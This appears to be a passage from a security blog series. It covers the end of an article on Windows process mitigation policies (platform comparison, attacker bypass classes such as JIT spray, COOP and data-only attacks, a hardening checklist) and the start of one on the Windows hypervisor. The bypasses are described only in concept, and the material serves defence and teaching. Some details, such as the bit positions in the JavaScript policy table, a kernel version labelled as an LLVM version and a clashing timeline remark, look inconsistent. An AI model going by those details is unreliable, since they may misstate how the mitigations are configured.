
Stacking the recipe is the best a 2026 user-mode process can be. But the attacker is still in the room. What survives even a fully-stacked process? What are the bypasses that work after every mitigation is on? Section 12 answers that. First, a quick comparison: what other operating systems do, and what they do differently.

11. What other operating systems do that Windows doesn't

Microsoft is not the only vendor with a per-process mitigation surface. Apple, Linux distributions, Chromium, and ARM-the-vendor are all in the same business, and they have made different structural choices. The honest comparison surfaces where Windows is ahead, where it is behind, and where the gap is not really a gap because the platforms solve slightly different problems.

Apple: Hardened Runtime, ARM PAC, and JIT entitlement. Apple shipped Pointer Authentication Codes (PAC) on the A12 (iPhone XS, September 2018) and on every Mac M1 onward. PAC signs a code pointer with a per-process cryptographic key held in privileged hardware registers, storing the signature in the unused upper bits of a 64-bit pointer. The ARM PACIA, AUTIA, PACIB, and AUTIB instructions sign and verify [@wiki-armv83a]; an unsigned or wrongly-signed pointer dereferenced through a BR/BLR instruction with the AUT variant faults. PAC is structurally stronger than CFG/XFG/CET because the key is held in privileged state and is unforgeable from user mode -- there is no bitmap to lift the validation through.

Apple's JIT entitlement (com.apple.security.cs.allow-jit) is a stronger architectural answer than ACG [@apple-hardened-runtime]. Code that wants to JIT must declare it at build time and is granted a specific in-process W^X carve-out only if the entitlement is signed into the binary's code signature. The result: JIT capability is an attribute of the signed binary rather than a runtime API call, which closes the race-the-mitigation-window class structurally rather than by API migration (UpdateProcThreadAttribute).

Linux: SELinux, landlock, LLVM -fsanitize=kcfi, LLVM -fsanitize=cfi-icall. Forward-edge CFI in the Linux kernel first arrived in version 5.13 (June 2021) as an LTO-based jump-table implementation; the second-generation -fsanitize=kcfi scheme, which places a 32-bit type hash immediately before each function entry and does not require link-time optimization, replaced it in 6.1 (December 2022) [@lwn-corbet-kcfi]. The kCFI design is conceptually very close to XFG, but cheap enough to deploy on a kernel build because it sheds the LTO requirement. LLVM's user-mode -fsanitize=cfi-icall provides per-prototype CFI via jump-table dispatch but still requires LTO [@clang-cfi-doc]. SELinux operates at a different layer of the stack (mandatory access control on filesystem and IPC resources) and is not directly comparable to a control-flow defense -- it constrains what the process can do rather than what control flows the process can follow.

Chromium / V8 sandbox. Chrome enables CFG on Windows, leans on ARM PAC on macOS, and is layering the V8 sandbox on top of all of them [@v8-sandbox-blog]. The V8 sandbox is a Chrome-side software defense: it confines a compromised renderer to a specific bounded memory range, so a renderer-process compromise cannot synthesize pointers to arbitrary out-of-sandbox memory. The V8 sandbox sits inside the renderer (different from the OOP-JIT trust boundary above it) and aims to make even a fully-compromised JIT-output bug non-fatal at the system level.

Android: Scudo allocator and ARM Memory Tagging Extension (MTE). MTE attaches a 4-bit tag to every 16-byte allocation [@arm-mte-newsroom]. The CPU enforces the tag on every pointer dereference: tag mismatch raises a synchronous exception. Pixel 8 (October 2023) was the first consumer device with MTE-default-on for the kernel and key system services [@arm-mte-newsroom]. MTE catches the cause (use-after-free, linear overflow into the next allocation) rather than the symptom (control-flow hijack). It is conceptually orthogonal to CFI. The hard part is perf cost on memory-tagged loads, meaningful enough that even Apple has not enabled MTE on iOS as of 2026.

Platform	Forward-edge	Backward-edge	Dynamic code	Memory safety
Windows (x64)	CFG (coarse), XFG (deprecated)	CET shadow stack	ACG	none structural
Apple (ARM64)	PAC (cryptographic, per-process key)	PAC (signs return addresses too)	JIT entitlement (declarative)	none structural
Linux kernel	`-fsanitize=kcfi` (LLVM 6.1+)	shadow stack on x86 CET; PAC-RA on ARM	not a kernel issue	Rust-in-kernel pilot
Android	PAC + BTI on supported SoCs	BTI / shadow call stack	sandboxed by selinux + seccomp	MTE on Pixel 8
Chromium	per-platform forward-edge	per-platform backward-edge	OOP JIT + V8 sandbox	layered

The honest accounting:

ARM PAC plus MTE is structurally stronger than CFG plus CET, because the cryptographic key (PAC) and the tag (MTE) are CPU-enforced state that no user-mode primitive can forge.
Apple's JIT entitlement is a stronger architectural answer than ACG because it is declarative at signing time rather than imperative at process startup.
SELinux/landlock is at a different layer (data access control) and is not directly comparable -- it solves a different problem.
Windows's mitigation surface is the most extensively deployed and most frequently extended per-process surface in industry use, by a wide margin. Twenty actual policies is more than any other vendor exposes to applications, and the API is stable, documented, and ABI-compatible across Windows versions back to Windows 8.

MTE catches what CFI cannot. A use-after-free that produces a controllable write -- but never violates the control-flow graph -- is invisible to CFG, XFG, CET, and PAC, but raises an MTE tag-mismatch fault on the very first attacker-controlled dereference. This is the structural reason memory-tagging is the emerging frontier and the structural reason a Windows-on-ARM-with-MTE future would close attack classes the current per-process surface cannot reach.

Stronger primitives exist on competing platforms. But Microsoft's per-process surface is the most extensively-deployed and most-frequently-extended in industry use. The bypasses are what tell us where the surface still leaks.

12. How attackers respond to a fully hardened process

Every generation of Windows mitigation has shipped with a named bypass within a year of its release. Here is the tradition, one named class per defensive generation.

Signed-DLL injection. Predates CIG. Find a Microsoft-signed DLL with a controllable side effect -- a DLL-search-order hijack against a signed Windows component, an Authenticode-padding write (CVE-2013-3900 family), or a signed driver with a known IOCTL privilege primitive. CIG sees a valid Microsoft signature and lets the DLL load. The mitigation is reactive: Microsoft's App Control / WDAC blocklist and the Driver Block List enumerate hundreds of banned-but-signed binaries; the list grows every quarter; the attacker's job is to find one not yet on it. This is one of the unsolved problems section 14 names.

JIT spray as a CFG bypass (Theori, 2016). The canonical writeup is Theori's Chakra JIT CFG Bypass [@theori-chakra-cfg-bypass]. The page itself states verbatim that the bypass targeted Microsoft Security Bulletin MS16-119 (October 2016) -- a Chakra fix that tightened the JIT's emit pattern. The technique: persuade the Chakra JIT to emit attacker-chosen byte sequences inside JIT-allocated code pages, at addresses the attacker has marked as valid CFG targets via the SetProcessValidCallTargets carve-out. The MS16-119 patch shrank the set of byte sequences a JavaScript program could induce the JIT to emit, but did not eliminate the technique structurally -- the structural fix was ACG (move the JIT out of process), section 8.

An exploitation technique in which an attacker writes JavaScript (or another JIT-targeted language) that causes the runtime JIT compiler to emit a long sequence of executable bytes at predictable addresses, where some of those emitted bytes form a useful gadget chain when reinterpreted at an offset. The classic JIT spray (Dion Blazakis, BHDC 2010) used Adobe Flash's ActionScript JIT. The 2016 Theori work generalised the idea to use the JIT to emit *CFG-valid* function-entry bytes [@theori-chakra-cfg-bypass].

COOP -- code-reuse without a single CFG-invalid call. Discussed in section 5; recapped here as the first bypass class against coarse-grained forward-edge CFI [@coop-ieeesecurity-pdf]. The structural fix is fine-grained CFI: XFG, which Microsoft did not enforce by default and has since deprecated; LLVM's -fsanitize=cfi-icall and -fsanitize=kcfi; ARM PAC. The per-prototype hash check that XFG would have provided is exactly the property that closes COOP.

Race-the-mitigation-window (Forshaw + Fratric, 2017). Discussed in section 8; recapped here. The structural fix is UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY), which installs mitigation policies by the kernel at CreateProcess time, before any user-mode code in the child runs. The race window between CreateProcess return and the child's SetProcessMitigationPolicy call is structurally closed. Documented in the Project Zero issue [@p0-issue-42450607] and the Exploit-DB mirror [@exploit-db-44467].

The CET-bypass research direction (McGarr, 2025). Connor McGarr's Black Hat USA 2025 deck Out of Control names the live research front: kCFG and kCET in the Windows kernel [@mcgarr-bhusa25]. The deck enumerates bypass classes that survive both kernel-mode CFG and kernel-mode CET: page-table modification of the kCFG bitmap (requires kernel write primitives the attacker may already have), abuse of unprotected global function-pointer arrays, structural limits of CET when the attacker is operating with kernel privileges in the first place. The user-mode mitigation surface is mature; the kernel-mode surface is where the live work happens. Hypervisor-Protected Code Integrity (HVCI) is what makes kCFG bitmap mutations harder -- the bitmap is in VTL1, and a VTL0 kernel write cannot touch it -- which is the cross-link to the VBS/Trustlets sibling article in this series.

Cross-context PAC oracles (Apple). Listed for comparative completeness. PAC's per-process key is forgeable if an attacker can call into a function that signs an attacker-controlled pointer with the per-process key and then read the result. This is a known research class on Apple platforms and has produced several CVEs against Safari and iOS over the past five years.

The honest summary is that three classes of bypass survive a fully-stacked user-mode process today:

Signed-but-vulnerable DLL hijack -- defeats CIG by definition (publisher check, not content check).
COOP-style chains where the prototypes match the call site -- defeats CFG (coarse-grained) and is not closed by CET because the call/return invariant holds.
Data-only attacks -- which never violate any control-flow invariant at all, because no control transfer is hijacked.

What is the theoretical limit on what process mitigations can do? That is the next section.

13. What process mitigations cannot do

The Abadi paper that founded CFI in 2005 [@msr-cfi] is also the paper that establishes CFI's structural ceiling. CFI is, by construction, a control-flow property. That is exactly the property a sophisticated attacker can avoid violating.

The formal claim from Abadi, Budiu, Erlingsson, and Ligatti: enforcement of CFI restricts an attacker to control-flow transfers that respect the static call graph. The paper does not say every reachable program behavior is benign. CFI says "the attacker's control flow stays inside the legal CFG." It does not say "the legal CFG is benign." Any attack that operates entirely within the legal CFG is invisible to any CFI variant, including CFG, XFG, CET, PAC, and kCFI.

The lower bound on what an attacker can do while staying inside the legal CFG is given by data-oriented programming. The canonical paper is Data-Oriented Programming: On the Expressiveness of Non-Control Data Attacks by Hong Hu, Shweta Shinde, Sendroiu Adrian, Zheng Leong Chua, Prateek Saxena, and Zhenkai Liang, all of the National University of Singapore Department of Computer Science [@dop-paper]. The abstract is constructive and devastating: "such attacks are Turing-complete. We present a systematic technique called data-oriented programming (DOP) to construct expressive non-control data exploits."

An exploitation technique in which the attacker corrupts non-control data -- authentication flags, length fields, function-table indices, loop bounds -- and lets the program's own legitimate, unmodified control flow execute the attacker's intended computation. Hu, Shinde, Adrian, Chua, Saxena, and Liang proved DOP is Turing-complete: any computation can be expressed as a chain of data-only corruptions in a sufficiently-large program [@dop-paper]. No CFI variant -- CFG, XFG, CET shadow stack, ARM PAC, kCFI -- can detect a DOP attack, because no control flow is hijacked.

The mechanism: the attacker corrupts a current_user.is_admin flag rather than redirecting a function pointer. They corrupt a buffer_len field to enable a subsequent legitimate write past the allocation's intended end. They corrupt a next_state index to drive a state machine through an attacker-chosen path. The program's own logic, executing every instruction the compiler emitted and following every control transfer the static call graph allows, performs the attack. DOP is, in a precise sense, the program working as designed -- on data the attacker has chosen.

A second structural limit: process mitigations are per-process. The kernel has a parallel mitigation surface (kCFG, kCET, HVCI, Secure Kernel, the VBS/Trustlets stack) the per-process policies do not touch [@mcgarr-bhusa25]. The user-mode hardening recipe stops at the syscall boundary. Everything beyond is the kernel's job. A renderer that is fully hardened can still be the entry point for a kernel privilege escalation if a syscall takes attacker-controlled input and the kernel-side code path has its own bug.

The third structural limit is the most uncomfortable to state.

Key idea: Process mitigations harden the exploit chain. They do not fix the bug. The C/C++ memory-safety bug is still there; mitigations just constrain what the attacker can do with it.

Matt Miller, then a senior security engineer at the Microsoft Security Response Center, said this in his Black Hat IL 2019 talk. The deck is on GitHub at the Microsoft MSRC Security Research repository, with the load-bearing slide preserved verbatim [@miller-bhil-pdf]:

~70% of the vulnerabilities addressed through a security update each year continue to be memory safety issues. -- Matt Miller, BlueHat IL 2019 [@miller-bhil-pdf]

ZDNet's contemporaneous coverage extended the claim: "around 70 percent of all the vulnerabilities in Microsoft products addressed through a security update each year are memory safety issues; a Microsoft engineer revealed last week at a security conference; over the last 12 years, around 70 percent of all Microsoft patches were fixes for memory safety bugs" [@zdnet-70percent].

Seventy percent. For a decade. The mitigations in this article -- CFG, XFG, CET, ACG, CIG, every smaller policy in the enum -- exist precisely because that number was not going down. Each generation raises the cost of weaponizing a memory-safety bug into a working exploit. None of them reduces the rate at which memory-safety bugs are introduced into the codebase in the first place.

For the kernel-mode side -- kCFG, kCET, HVCI, and the Trustlets that execute in the Virtual Trust Level 1 (VTL1) Secure Kernel layer -- see the *VBS and Trustlets* sibling article in this series. The user-mode and kernel-mode mitigation surfaces are designed to compose: a renderer hardened to the canonical recipe in section 10, syscalling into a kernel hardened with kCFG and kCET, and protected by an HVCI hypervisor, is the layered defense Microsoft's strategic direction since 2014 has been building toward.

The only ceiling-breaker is to replace the language (so the bug never exists) or to replace the memory model (so the bug cannot be turned into a primitive). The two long-term answers are: memory-safe systems languages, principally Rust (Microsoft has been publicly committing to Rust in Windows since 2019 [@msrc-rust-2019]); and capability-hardware platforms like CHERI and ARM MTE, which catch the bug at the dereference rather than the chain.

Three things have to be true for mitigations to keep buying time:

Each new mitigation closes a specific attack class -- which means a specific bypass class becomes the next research front.
Each new bypass class must take an attacker longer to develop than it takes Microsoft to ship the next mitigation -- otherwise the curve goes the wrong way.
The fraction of memory-safety bugs in shipped code has to either stop rising or start falling -- otherwise no number of mitigations stacks fast enough.

Mitigations are a delaying action. The long-term answer is somewhere else. The reader's belief at this point is no longer "stack enough mitigations and we win." It is "mitigations have a structural ceiling, and the bug is still there." If process mitigations have a ceiling, what is Microsoft pivoting toward, and what is the open frontier?

14. Open problems

Six things are still unsolved -- or, more precisely, six things are partially solved in ways that are documented but visibly imperfect.

1. Forward-edge CFI without recompilation. Binary-rewriting CFI (BinCFI, Mocfi, Lockdown) is not production-grade on Windows. Microsoft's strategic answer is "recompile first-party code with /guard:cf and accept that legacy third-party binaries remain unguarded." That answer is a long-tail problem: the surface of legacy third-party DLLs that load into hardened Windows processes (drivers, COM components, accessibility tools) is large, slow to recompile, and outside Microsoft's direct control.

2. Backward-edge protection on pre-CET hardware. Microsoft's pre-CET internal experiment was Return Flow Guard (RFG), a software-implemented per-thread shadow stack maintained by the runtime rather than the CPU. Tencent Xuanwu Lab bypasses came faster than Microsoft could harden RFG [@wiki-cfi]; Microsoft pivoted to wait for Intel CET. Pre-Tiger-Lake (pre-September-2020) Intel hardware and pre-Zen-3 (pre-November-2020) AMD hardware remain unprotected on the backward edge. Enterprises that need backward-edge protection on older hardware have to sandbox in VBS-isolated VMs -- cross-link to the VBS/Trustlets sibling article.

3. The JIT-engine compatibility tax under ACG. Out-of-process JIT adds roughly a millisecond per JIT compilation for the IPC round-trip. For short-lived JavaScript (lots of small functions, one-shot pages, ad-network microservices), this is significant. Chrome's V8 sandbox project (active since 2023) confines the JIT process to a sandboxed memory range of the renderer's address space, which closes the IPC-level attack class but does not erase the perf cost [@v8-sandbox-blog]. Interpreter-only renderers for low-trust contexts (small pages, ad iframes) are the medium-term direction; the cost is the runtime perf gap to fully-jitted JS.

4. ACG plus AV interoperability. Defender's MsMpEng.exe cannot enable ACG. The scanner engine generates code at runtime: signature compilation routines, emulator bytecode, regex JITs. Migration to interpreted bytecode is partial. This is a permanent compatibility tension between W^X-as-process-invariant and runtime-generated-code-as-a-feature, and it shows up in every AV engine across every vendor (CrowdStrike Falcon, SentinelOne, Symantec), not just Defender.

5. Signed-but-vulnerable Microsoft DLLs as universal CIG-bypass loaders. The Microsoft-signed DLL surface is enormous and historically full of side-effect DLLs. The App Control / WDAC blocklist is reactive. The blocklist publishes quarterly. New signed-but-vulnerable DLLs are found every quarter. This is a permanent residual risk against CIG and the structural reason vendors with sensitive workloads sometimes run with MitigationOptIn plus a per-process allowlist rather than MicrosoftSignedOnly plus an unbounded universe.

6. XFG default-on tradeoffs. XFG's instrumentation is in the MSVC binaries; the dispatch thunks are in ntdll.dll. Enforcement-by-default never shipped. McGarr's BHUSA 2025 deck names XFG as "deprecated" [@mcgarr-bhusa25]; Microsoft's strategic direction is hardware-backed CFI (CET shadow stack for the backward edge) plus KCFG / KCET in the kernel. The unsolved question is whether the forward edge can ever get fine-grained protection without the compatibility cost that killed XFG. Apple's PAC suggests yes (because the cryptographic key approach has zero compatibility cost on cast); LLVM's -fsanitize=cfi-icall suggests yes for code built end-to-end with LTO. Neither has a Windows analog as of 2026.

Recompile first-party code with `/guard:cf /CETCOMPAT`. Push the kernel hardening (kCFG, kCET, HVCI) forward, since the user-mode surface is mature. Lean on hardware (Intel CET, AMD shadow stack, eventually MTE-on-Windows-on-ARM) rather than software heuristics. Accept that legacy unrecompiled binaries remain unguarded and quarantine them in lower-trust VBS-isolated contexts. That is the strategy McGarr's 2025 deck implies and that the Defender / Edge / Recall configurations in the section 10 matrix execute [@mcgarr-bhusa25].

Six open problems. The first four are engineering. The last two are structural. The structural ones suggest the next-decade answer is not a better mitigation, but a different memory model: Rust, CHERI, MTE.

15. Practical guide: ten steps to ship a hardened binary

Concrete. Ten steps. By the end of this checklist, your new sandboxed-parser binary is hardened to the canonical 2026 recipe.

Run dumpbin /headers /loadconfig YourBinary.exe. Verify the Guard Flags word is non-zero, that FID Table present is in the output, and that the Guard CF Function Table is non-empty [@ms-cfg-doc].
Compile and link with: /guard:cf /guard:cfw /CETCOMPAT /DYNAMICBASE /HIGHENTROPYVA /NXCOMPAT. The /CETCOMPAT flag requires Visual Studio 2019 or later and x64 only [@ms-guard-cf-compiler, @ms-guard-cf-linker, @ms-cetcompat].
Call SetProcessMitigationPolicy (or, better, UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY) for child processes) for: ProcessDynamicCodePolicy, ProcessExtensionPointDisablePolicy, ProcessImageLoadPolicy (with NoRemoteImages plus NoLowMandatoryLabelImages plus PreferSystem32Images), ProcessStrictHandleCheckPolicy, ProcessSystemCallDisablePolicy (if your process does not draw windows), and ProcessUserShadowStackPolicy (with EnableUserShadowStack and, for the most-hardened sandboxes, BlockNonCetBinaries) [@ms-setprocessmitigationpolicy, @ms-dynamic-code-policy, @ms-image-load-policy, @ms-user-shadow-stack-policy].
Use UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY) rather than post-CreateProcess policy installation for any child process. This is the single most important step on this list.
Audit with Set-ProcessMitigation -PolicyFilePath (Group Policy / Intune deployable XML). The schema and the cmdlet are documented in the Defender Exploit Protection reference [@ms-defender-exploit-protection].
For sandboxed parsers (PDF, image, video, font), enable ProcessFontDisablePolicy. Refuse non-system fonts at the per-process layer.
For signed-component-only processes, enable ProcessSignaturePolicy(MicrosoftSignedOnly). Accept that some third-party DLLs will not load and document each gap in your threat model [@ms-binary-signature-policy].
For browser-class sandboxed children, prohibit child-process creation with ProcessChildProcessPolicy. Closes the renderer-to-cmd.exe pivot class.
Validate the rendered policy at runtime with Get-ProcessMitigation -Name <binary>. Spot-check that every flag you set in code is reflected in the cmdlet output [@ms-defender-exploit-protection].
For each policy you cannot enable, document the structural reason in your threat model. A binary that misses CIG because it depends on third-party COM add-ins is making a deliberate threat-model choice; that choice must be visible to the security review.

Note: UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY) closes the race-the-mitigation-window class structurally (section 8, section 12). Every other step on this list is a useful addition. Step 4 is the load-bearing step that lets every other step work as designed. Without it, a peer process in the same security context can disable any of the others between CreateProcess and the child's first attempt to install its policies.

The composition of the policy bitfield itself is mechanical. Each policy is a small DWORD-sized structure; the mitigation-policy attribute for UpdateProcThreadAttribute packs the relevant flags into a 64-bit MitigationOptions value plus an optional 64-bit MitigationAuditOptions value.

Run this in an elevated PowerShell session, replacing `msedge.exe` with the basename of your binary:

Get-ProcessMitigation -Name msedge.exe |
  Format-List CFG, CETShadowStack, BinarySignature, DynamicCode,
              ExtensionPoint, ImageLoad, StrictHandle, SystemCall,
              ChildProcess, FontDisable, PayloadRestriction,
              SideChannelIsolation, ASLR, DEP

Each block in the output shows Enable, Audit, and the subordinate flag word with its individual boolean fields. Spot-check that every flag your code sets in SetProcessMitigationPolicy is reflected as ON in the cmdlet output, and that any OFF or NOTSET cell has a documented structural reason in your threat model [@ms-defender-exploit-protection].

{` // Each name is documented in PROCESS_CREATION_MITIGATION_POLICY_* constants // in winnt.h. The bit positions below match the Microsoft Learn reference. const POL = { // First DWORD: legacy mitigations 'DEP_ENABLE': 0x01n << 0n, 'DEP_ATL_THUNK_ENABLE': 0x01n << 1n, 'SEHOP_ENABLE': 0x01n << 2n, 'FORCE_RELOCATE_IMAGES_ALWAYS_ON':0x01n << 8n, 'HEAP_TERMINATE_ALWAYS_ON': 0x01n << 12n, 'BOTTOM_UP_ASLR_ALWAYS_ON': 0x01n << 16n, 'HIGH_ENTROPY_ASLR_ALWAYS_ON': 0x01n << 20n, // Second DWORD: modern mitigations (packed at +32) 'STRICT_HANDLE_CHECKS_ALWAYS_ON': 0x01n << 32n, 'WIN32K_SYSTEM_CALL_DISABLE_ALWAYS_ON': 0x01n << 36n, 'EXTENSION_POINT_DISABLE_ALWAYS_ON': 0x01n << 40n, 'PROHIBIT_DYNAMIC_CODE_ALWAYS_ON': 0x01n << 44n, 'CONTROL_FLOW_GUARD_ALWAYS_ON': 0x01n << 48n, 'BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON': 0x01n << 52n, 'FONT_DISABLE_ALWAYS_ON': 0x01n << 56n, 'IMAGE_LOAD_NO_REMOTE_ALWAYS_ON': 0x01n << 60n, };

// Compose the recipe for a sandboxed PDF parser const enabled = [ 'DEP_ENABLE', 'BOTTOM_UP_ASLR_ALWAYS_ON', 'HIGH_ENTROPY_ASLR_ALWAYS_ON', 'STRICT_HANDLE_CHECKS_ALWAYS_ON', 'WIN32K_SYSTEM_CALL_DISABLE_ALWAYS_ON', 'EXTENSION_POINT_DISABLE_ALWAYS_ON', 'PROHIBIT_DYNAMIC_CODE_ALWAYS_ON', 'CONTROL_FLOW_GUARD_ALWAYS_ON', 'BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON', 'FONT_DISABLE_ALWAYS_ON', 'IMAGE_LOAD_NO_REMOTE_ALWAYS_ON', ];

let options = 0n; for (const name of enabled) options |= POL[name]; console.log('MitigationOptions = 0x' + options.toString(16).padStart(16, '0')); console.log('Policies enabled: ' + enabled.length + ' of ' + Object.keys(POL).length); `}

Stack the recipe. Document the gaps. Watch the FAQ below for the common misconceptions you will hit on the way.

16. Frequently asked questions

On x64 Windows, DEP is unconditionally on for all processes. `ProcessDEPPolicy` in `SetProcessMitigationPolicy` is a 32-bit-only vestigial knob, retained because some 32-bit legacy code is still in production [@ms-setprocessmitigationpolicy]. For new code on x64, you do not need to touch the DEP policy; the only useful per-process refinement is `ProcessASLRPolicy` (specifically `ForceRelocateImages` and `HighEntropy`), to insist on high-entropy randomization even when third-party DLLs were built without `/DYNAMICBASE`. No. They attack different surfaces. CIG (`ProcessSignaturePolicy`) prohibits *loading unsigned images*. ACG (`ProcessDynamicCodePolicy`) prohibits *generating new executable code at runtime*. An attacker who finds a signed-but-vulnerable DLL bypasses CIG but does not bypass ACG. An attacker who finds a JIT-spray primitive in an in-process JIT bypasses ACG but does not bypass CIG (because they are not loading a new DLL). The two are orthogonal, and a hardened process needs both [@miller-acg-blog, @ms-binary-signature-policy, @ms-dynamic-code-policy]. No. The MSVC `/guard:xfg` flag exists. The `__guard_xfg_dispatch_icall_fptr` thunk exists in `ntdll.dll`. The instrumentation is in some binaries. Enforcement-by-default never shipped, and Connor McGarr's Black Hat USA 2025 deck describes XFG as "deprecated" [@mcgarr-bhusa25]. Microsoft's strategic direction is hardware-backed CET shadow stack for the backward edge plus kCFG and kCET in the kernel; fine-grained forward-edge protection on Windows in 2026 means LLVM's `-fsanitize=cfi-icall` on opted-in builds, not XFG. Only the return-edge variant. CET shadow stack catches any attempt to corrupt a return address on the regular stack and then return through it [@cet-techcommunity-wayback]. *Call-oriented programming* (COP, chains of `call`-terminated gadgets) and *jump-oriented programming* (JOP, chains of `jmp`-terminated gadgets) preserve the call/return invariant -- the gadgets do not return through corrupted stack frames -- so CET sees nothing. COOP (section 5) chains entire legitimate virtual function calls with matching call/return pairs; CET also sees nothing [@coop-ieeesecurity-pdf]. CET stops *classical* ROP. It does not stop code-reuse exploitation in general. Because ACG, enabled in Edge in Windows 10 1703 (March 2017), made in-process JIT a `STATUS_DYNAMIC_CODE_BLOCKED` error [@miller-acg-blog]. The Chakra JIT (then later V8 when Edge moved to Chromium) was rearchitected to run in a separate JIT process that compiles JavaScript and ships the compiled code back to the renderer via an authenticated IPC channel plus a signed-section mapping. The renderer maps the signed section read-execute via `MapViewOfFile`; nothing in the renderer ever calls `VirtualAlloc(PAGE_EXECUTE_*)`. Section 8 walks the architecture in detail. They constrain the exploit chain but do not fix the root-cause bug. Data-oriented attacks (DOP, section 13) are Turing-complete and survive every CFI variant because no control flow is ever hijacked [@dop-paper]. Signed-but-vulnerable DLLs survive CIG. ACG plus CIG closes the *code* dimension on a hardened process, but a sufficiently-determined attacker who finds a write-what-where primitive can still build a data-only exploit chain in any nontrivial program. The long-term answer is memory-safe languages; Microsoft has been publicly committing to Rust in Windows since 2019, and Matt Miller's BlueHat IL 2019 talk gave the structural justification: "~70% of the vulnerabilities addressed through a security update each year continue to be memory safety issues" [@miller-bhil-pdf]. The short-term answer is the recipe in section 15: stack the mitigations, document the gaps, and treat memory-safety as the limit you are working against.

The bug is still there. The exploit is just much harder. The article ends where it began: a renderer process that survived an info-leak-plus-write-what-where chain because six per-process mitigations all held at once. That is what Windows process mitigation policies do.

Above Ring Zero: How the Windows Hypervisor Became a Security Primitive

noreply@paragmali.com (Parag Mali) — Sun, 10 May 2026 00:00:00 GMT

**The Windows hypervisor is the program that loaded before Windows did.** It runs at a privilege level the Windows kernel cannot reach and owns the page tables that decide which memory the Windows kernel may even see. Virtualization-Based Security, Credential Guard, HVCI (Memory Integrity in Windows Security), Application Control, VBS Enclaves, and System Guard Secure Launch are all built by composing five primitives the hypervisor exposes -- partitions, hypercalls, intercepts, SynIC, and per-VTL SLAT. The substrate is real, alive, and producing two to four public CVEs per year; the residual attack surface (firmware below, side channels above, IOMMU bypass beside, hypervisor rollback) is where Windows security still earns its hardest miles.

1. Above Ring Zero

On a Windows 11 machine with VBS turned on, a kernel-mode driver running with full Ring-0 privilege cannot read a single byte of the LSASS process's credential cache. It cannot load an unsigned driver. It cannot patch ntoskrnl.exe. It cannot disable HVCI without a reboot. None of this is enforced by Windows. It is enforced by a different program -- one that loaded before Windows did, that runs at a privilege level the Windows kernel cannot reach, and that owns the page tables that say which memory the Windows kernel may even see. That program is the Windows hypervisor [@ms-hyperv-architecture, @ms-tlfs-vsm].

The intuition this fact violates is older than most readers' careers. "SYSTEM owns the box." Every introductory security course teaches it. Local administrator escalates to SYSTEM, SYSTEM loads a driver, the driver runs in the kernel, and the kernel can do anything to the machine. That model is correct for a Windows installation running without Virtualization-Based Security. It is wrong, in three specific and load-bearing ways, for a Windows installation that has VBS turned on.

A Windows security architecture that uses the Hyper-V hypervisor to create a small, isolated execution environment alongside the normal Windows operating system. The hypervisor allocates a portion of memory, configures its second-level page tables to make that memory unreadable and unwritable from normal kernel mode, and runs Microsoft-signed code there -- the Secure Kernel and isolated user-mode trustlets -- that the regular NT kernel cannot reach. Credential Guard, HVCI, Application Control, and System Guard all sit on top of this primitive [@ms-tlfs-vsm].

The binary in question is named hvix64.exe on Intel hosts and hvax64.exe on AMD hosts.Loose security writing sometimes calls the hypervisor's privilege level "Ring -1." That phrase is colloquial. Intel's manuals say "VMX root operation"; AMD's manuals say "SVM host mode." Both terms denote a CPU operating mode that sits architecturally outside the four-ring privilege stack the guest OS sees, not a fifth ring inside it. It is loaded by hvloader.efi before winload.exe ever runs. By the time the Windows boot manager hands control to the NT kernel, the hypervisor has already configured the CPU's virtualization extensions, allocated its own private memory, taken ownership of the IOMMU, and set up the per-partition second-level page tables that decide which physical pages each partition can see [@ms-tlfs-pdf]. From the NT kernel's point of view, the machine starts up already inside a guest partition. There is no escape upward.

This article is about the program that loaded first. The siblings in this series -- on the Secure Kernel, on Credential Guard and NTLMless, on Secure Boot, and on Adminless -- all assume what this article explains. Each of them describes a policy: the Secure Kernel enforces code integrity; Credential Guard isolates LSASS; Adminless raises the bar on local administrator. None of those policies would be enforceable without a piece of software running at a privilege level the policy's adversary cannot reach. The hypervisor is that piece of software, and "security primitive" is how Microsoft, the security research community, and the bug-bounty market all describe its current role.

By the end of this article you will know five things. First, why the hypervisor became a security primitive -- the architectural failure of Ring-0 defenses that Microsoft fought for a decade and finally gave up on in 2015. Second, how it became one, in three steps: Popek and Goldberg's 1974 virtualizability theorem; Intel VT-x and AMD-V in 2005-2006; and David Hepkin and Arun Kishan's 2013 patent on hierarchical Virtual Trust Levels [@us9430642b2-patent]. Third, what it enforces, feature by feature, with the hypervisor primitive that backs each: HVCI rides on per-VTL SLAT; Credential Guard rides on SynIC plus the secure-call ABI; System Guard Secure Launch rides on DRTM [@ms-system-guard-secure-launch]. Fourth, where it has actually failed in public -- six worked CVEs across three distinct attack classes, all narrowly localized. Fifth, what is structurally outside its mandate: firmware below the hypervisor, microarchitectural side channels above it, IOMMU bypass beside it, and hypervisor rollback through the update pipeline.

The story is half engineering and half conceptual inversion. How did a server-consolidation hypervisor that shipped in 2008 with Windows Server 2008 -- a product whose original marketing pitch was "run more VMs per box" -- become the architectural substrate that protects every load-bearing Windows security boundary in 2026? The answer begins in 1974, with a paper that defined what a hypervisor even is. But the political and engineering thread begins five years before that, in San Mateo, California.

2. Origins -- Connectix to Viridian to Hyper-V

Microsoft entered the virtualization market three years late and by acquisition. On February 19, 2003, the company bought Connectix, a small San Mateo software house founded in 1988 that had built Virtual PC for Macintosh and, later, Virtual PC for Windows. The Connectix engineers became the nucleus of what Microsoft would internally call the Windows Server Virtualization team. The acquired products shipped as Microsoft Virtual PC 2004 and Microsoft Virtual Server 2005. Both were Type-2 hypervisors -- user-mode applications that ran on top of Windows, using software techniques rather than CPU virtualization extensions, because the CPU virtualization extensions did not yet exist on shipping x86 hardware.

A hypervisor that runs directly on hardware rather than as an application on top of a host operating system. The hypervisor owns the CPU, the second-level page tables, and (in the security-relevant case) the IOMMU; guest operating systems run at a lower privilege level, in partitions or virtual machines that the hypervisor schedules and isolates. IBM's CP-67/CMS in 1968 is the genre's origin; VMware ESX, Xen, and the Microsoft hypervisor (`hvix64.exe`/`hvax64.exe`) are the modern examples [@wp-hypervisor].

